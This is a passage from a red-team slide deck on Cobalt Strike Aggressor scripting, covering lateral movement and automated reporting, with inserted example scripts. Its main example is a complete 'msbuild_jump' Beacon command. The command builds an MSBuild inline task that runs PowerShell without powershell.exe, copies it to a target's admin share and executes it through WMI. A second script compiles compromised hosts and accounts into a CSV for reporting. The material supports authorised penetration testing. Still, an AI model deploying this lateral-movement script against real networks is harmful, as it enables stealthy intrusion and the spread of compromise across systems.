90. Lateral Movement
▸ Let's use Aggressor to build out a newer technique of Lateral Movement
▸ Focus on using unmanaged PowerShell with MSBuild
▸ Set global variables to help generate the XML file
▸ Functions that we need to utilize:
▹ alias
▹ beacon_command_register
▹ bupload_raw
▹ bpowerpick
▹ exec
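The five functions above assembled into a Beacon command, as an added example and not the deck's own script. The MSBuild project's inline C# task runs the script through System.Management.Automation, so no powershell.exe starts on the target; the project is copied to the target's admin share and msbuild.exe is started there with a WMI process-create issued from unmanaged PowerShell (powerpick) in the current Beacon. It assumes alias, beacon_command_register, bcd, bupload_raw, bpowerpick, berror, base64_encode and strrep as documented and openf/readb/closef from Sleep; the .NET framework path, remote directory and task name are choices for this example, and the operator supplies a .ps1 on the Cobalt Strike client (for instance a stager one-liner saved to a file).

```sleep
# Added example (not the deck's script): 'msbuild_jump' Beacon command.
# Assumes alias/beacon_command_register/bcd/bupload_raw/bpowerpick/berror,
# base64_encode/strrep, and Sleep's openf/readb/closef. Framework path,
# remote directory and task name are choices for this example.

global('$msbuild_template $msbuild_exe $remote_dir');
$msbuild_exe = "C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\MSBuild.exe";
$remote_dir  = "\\Windows\\Temp";    # below the target's C$ share

# Project template; __B64SCRIPT__ is replaced with the base64 of the script
# so the PowerShell needs no quoting inside the C# source.
$msbuild_template =
  '<Project ToolsVersion="4.0" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">' . "\n" .
  '  <Target Name="Build"><RunPS /></Target>' . "\n" .
  '  <UsingTask TaskName="RunPS" TaskFactory="CodeTaskFactory"' . "\n" .
  '    AssemblyFile="C:\Windows\Microsoft.Net\Framework64\v4.0.30319\Microsoft.Build.Tasks.v4.0.dll">' . "\n" .
  '    <Task>' . "\n" .
  '      <Reference Include="System.Management.Automation" />' . "\n" .
  '      <Code Type="Class" Language="cs"><![CDATA[' . "\n" .
  '        using System; using System.Text; using System.Management.Automation;' . "\n" .
  '        using Microsoft.Build.Framework; using Microsoft.Build.Utilities;' . "\n" .
  '        public class RunPS : Task, ITask {' . "\n" .
  '          public override bool Execute() {' . "\n" .
  '            string s = Encoding.UTF8.GetString(Convert.FromBase64String("__B64SCRIPT__"));' . "\n" .
  '            using (PowerShell ps = PowerShell.Create()) { ps.AddScript(s).Invoke(); }' . "\n" .
  '            return true;' . "\n" .
  '          }' . "\n" .
  '        }' . "\n" .
  '      ]]></Code>' . "\n" .
  '    </Task>' . "\n" .
  '  </UsingTask>' . "\n" .
  '</Project>' . "\n";

# Final project text for a PowerShell script string
sub msbuild_project {
    return strrep($msbuild_template, "__B64SCRIPT__", base64_encode($1));
}

alias msbuild_jump {
    local('$bid $target $file $handle $script $dest');
    ($bid, $target, $file) = @($1, $2, $3);
    if ($target eq "" || $file eq "" || !-exists $file) {
        berror($bid, "Use: msbuild_jump <host> <local .ps1>");
        return;
    }
    $handle = openf($file);
    $script = readb($handle, -1);
    closef($handle);

    # \\target\C$\Windows\Temp ('$' kept in single quotes so Sleep leaves it alone)
    $dest = "\\\\" . $target . "\\C" . '$' . $remote_dir;
    bcd($bid, $dest);                               # upload lands in Beacon's cwd
    bupload_raw($bid, "build.xml", msbuild_project($script));

    # Start msbuild.exe on the target via WMI, from unmanaged PowerShell here
    bpowerpick($bid, "Invoke-WmiMethod -ComputerName " . $target .
        " -Class Win32_Process -Name Create -ArgumentList '" .
        $msbuild_exe . " C:" . $remote_dir . "\\build.xml'");
}
beacon_command_register("msbuild_jump",
    "Lateral movement: MSBuild inline task running PowerShell (no powershell.exe)",
    "Use: msbuild_jump <host> <local .ps1>\n\nCopies an MSBuild project to the host's admin share and runs it with msbuild.exe via WMI.");
```

The Beacon's working directory stays on the remote share after the command; issue a cd back to a local path before uploading anything else. The build.xml left in Windows\Temp is an artifact to clean up once the new session is in.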
104. Reporting
▸ Reporting is part of every assessment and it should be done right
▹ What value are we if we can hack our customers but can’t convey what we did, risk remediations, etc.?
▸ There are steps you can take to make reporting more efficient
▹ Develop approved finding language
▹ Develop reporting templates
▹ Automate generating commonly requested information
105. Reporting
▸ Let’s tackle that last bullet point
▹ Automate generating commonly requested information
▸ What’s something that our customers ALWAYS ask?
▹ What computers were compromised?
▹ What accounts were compromised?
▸ Let’s create a report generating function which captures this information!
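One such report-generating function, as an added example rather than the deck's own. It reads the data model described on slide 16 and assumes beacons() entries carry computer, user and internal, that credentials() entries carry realm, user and source, that a reporting popup hook exists, and openf/println/closef from Sleep; the output path is a placeholder.

```sleep
# Added example (not from the deck): answer "which computers and accounts
# were compromised?" from the data model and write a CSV. Assumes beacons()
# fields computer/user/internal, credentials() fields realm/user/source, the
# reporting popup hook and Sleep's openf/println/closef. Path is a placeholder.

# host -> "user,internal ip", one row per host however many sessions it had
sub compromised_hosts {
    local('%hosts $b $host');
    foreach $b (beacons()) {
        $host = uc($b['computer']);
        if ($host in %hosts) { continue; }
        %hosts[$host] = $b['user'] . "," . $b['internal'];
    }
    return %hosts;
}

# "REALM\user" -> where the credential came from; secrets stay out of the report
sub compromised_accounts {
    local('%accts $c $key');
    foreach $c (credentials()) {
        $key = uc($c['realm']) . "\\" . lc($c['user']);
        %accts[$key] = $c['source'];
    }
    return %accts;
}

# Write both tables to the file at $1 and return the number of data rows
sub write_report {
    local('$h %hosts %accts $k $rows');
    $rows  = 0;
    %hosts = compromised_hosts();
    %accts = compromised_accounts();
    $h = openf(">" . $1);
    println($h, "type,name,detail");
    foreach $k (sorta(keys(%hosts))) { println($h, "host," . $k . "," . %hosts[$k]); $rows += 1; }
    foreach $k (sorta(keys(%accts))) { println($h, "account," . $k . "," . %accts[$k]); $rows += 1; }
    closef($h);
    return $rows;
}

popup reporting {
    item "Compromised hosts and accounts (CSV)" {
        local('$n');
        $n = write_report("/tmp/compromised.csv");
        show_message("Wrote " . $n . " rows to /tmp/compromised.csv");
    }
}
```

Dedupe by host and by realm\user is what makes the numbers match what the customer counts; a host with five Beacon sessions is still one compromised computer.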
109. Where to get this?
▸ We just covered a lot of different code
▸ Aggregate everything within a central repo
▹ This is not all our code
▹ It’s some of the scripts we use the most in one area
▸ https://github.com/FortyNorthSecurity/AggressorAssessor
▹ Get all of the code here!
@ChrisTruncer
▹ https://www.fortynorthsecurity.com
@r3dQu1nn
▹ https://github.com/harleyQu1nn/AggressorScripts
Thanks!